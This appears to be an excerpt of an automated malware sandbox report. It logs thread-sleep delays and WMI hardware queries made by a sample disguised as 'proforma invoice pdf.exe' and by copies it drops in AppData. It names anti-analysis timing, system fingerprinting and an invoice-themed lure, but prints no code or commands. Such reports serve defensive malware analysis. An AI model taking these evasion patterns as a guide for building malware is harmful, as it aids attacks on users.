Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -1199653s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -1199545s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -1199406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -1199269s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -1199075s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -1198664s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -1198438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -599855s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -599750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -599640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -599530s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -599422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -599309s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -599202s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -599093s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -598984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -598874s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -598756s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -598625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -598516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -598391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -598281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -598172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -598062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -597953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -597844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -597734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -597625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -597516s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -597391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -597266s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -597156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -597047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -596826s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -596717s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -596497s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -596281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -596170s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -596058s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -595946s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -595828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -595718s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -595494s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -594406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -594225s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -594086s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5260	Thread sleep time: -593906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 2172	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5788	Thread sleep count: 6977 > 30
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -35048813740048126s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -1199875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 5788	Thread sleep count: 2795 > 30
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -1199766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -1199641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -1199531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -599859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -599750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -599641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -599532s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -599407s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -599282s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -599157s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -599047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -598858s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -598661s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -598310s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -598093s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -597922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -597761s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -597653s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -597466s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -597339s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -597218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -596985s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -596860s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -596735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -596610s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -596485s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -596360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -596235s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -596110s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -595985s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -595850s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -595733s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -595624s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -595514s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -595407s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -595282s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -595157s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -595032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -594916s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -594766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -594456s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -593938s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -593805s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -593703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -593589s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -593485s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -593360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -593235s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe TID: 1224	Thread sleep time: -593110s >= -30000s

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 1199818	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 1199598	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 1199458	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 1199297	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 1199171	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 1199054	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 599860	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 599735	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 599610	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 599484	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 599363	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 599235	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598606	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598165	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 596944	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 596712	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 596559	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 596352	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 595407	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 595282	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 595157	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 595032	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594907	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594558	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594453	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1199826
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1199525
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1199421
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1199310
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1199203
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1199091
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 1198983
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599763
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 598985
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 598735
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 598381
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597986
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597641
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597516
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597407
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597290
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597172
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 597063
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596844
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 595719
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 595321
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 594583
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 594454
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 594323
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 594205
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Thread delayed: delay time: 594078
